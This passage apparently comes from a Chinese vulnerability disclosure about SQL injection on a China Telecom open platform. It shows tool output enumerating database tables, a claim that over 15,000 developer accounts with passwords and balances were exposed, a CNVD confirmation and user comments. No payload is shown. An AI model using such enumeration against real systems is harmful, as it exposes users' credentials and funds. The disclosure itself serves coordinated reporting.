[21:14:46] [INFO] resumed: emp_d_20130810

[21:14:46] [INFO] resumed: emp_d_20130811

[21:14:46] [INFO] resumed: emp_d_20130812

[21:14:46] [INFO] resumed: emp_d_20130813

[21:14:46] [INFO] resumed: emp_d_20130814

[21:14:46] [INFO] resumed: emp_d_20130815

[21:14:46] [INFO] resumed: emp_d_20130816

[21:14:46] [INFO] resumed: emp_d_20130817

[21:14:46] [INFO] resumed: emp_d_20130818

[21:14:46] [INFO] resumed: emp_d_20130819

[21:14:46] [INFO] resumed: emp_d_20130820

[21:14:46] [INFO] resumed: emp_d_20130821

[21:14:46] [INFO] resumed: emp_d_20130822

[21:14:46] [INFO] resumed: emp_d_20130823

[21:14:46] [INFO] resumed: emp_d_20130824

[21:14:46] [INFO] resumed: emp_d_20130825

[21:14:46] [INFO] resumed: emp_d_20130826

[21:14:46] [INFO] resumed: emp_d_20130827

[21:14:46] [INFO] resumed: emp_d_20130828

[21:14:46] [INFO] resumed: emp_d_20130829

[21:14:46] [INFO] resumed: emp_d_20130830

[21:14:46] [INFO] resumed: emp_d_20130831

[21:14:46] [INFO] resumed: emp_d_20130901

[21:14:46] [INFO] resumed: emp_d_20130902

[21:14:46] [INFO] resumed: emp_d_20130903

[21:14:46] [INFO] resumed: emp_d_20130904

[21:14:46] [INFO] resumed: emp_d_20130905

[21:14:46] [INFO] resumed: emp_d_20130906

[21:14:46] [INFO] resumed: emp_d_20130907

[21:14:46] [INFO] resumed: emp_d_20130908

[21:14:46] [INFO] resumed: emp_d_20130909

[21:14:46] [INFO] resumed: emp_d_20130910

[21:14:46] [INFO] resumed: emp_d_20130911

[21:14:46] [INFO] resumed: emp_d_20130912

[21:14:46] [INFO] resumed: emp_d_20130913

[21:14:46] [INFO] resumed: emp_d_20130914

[21:14:46] [INFO] resumed: emp_d_20130915

[21:14:46] [INFO] resumed: emp_d_20130916

[21:14:46] [INFO] resumed: emp_d_20130917

[21:14:46] [INFO] resumed: emp_d_20130918

[21:14:46] [INFO] resumed: emp_d_20130919

.......

表太多，读不完，算了，找到了表：emp_cms_member

漏洞证明：

涉及万款左右的应用，危害还是蛮大的

修复方案：

再次声明：这1.5w+的开发者数据仅读取了4条作危害证明

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-07-1315:02

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

评价

2010-01-01 00:00 U神白帽子 | Rank:788 漏洞数:65)
厉害！前排
2010-01-01 00:00 backtrack丶yao 白帽子 | Rank:0 漏洞数:0)
厉害！前排
2010-01-01 00:00 有归于无白帽子 | Rank:49 漏洞数:5)
phpcms那个open吧。。。不是更新了么？
2010-01-01 00:00 浮萍白帽子 | Rank:326 漏洞数:33)
师傅

原文连接：运营商安全之中国电信某开放平台SQL注入漏洞(涉及1.5W+开发者账号详细信息含账号密码\邮箱\账户金额等) 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。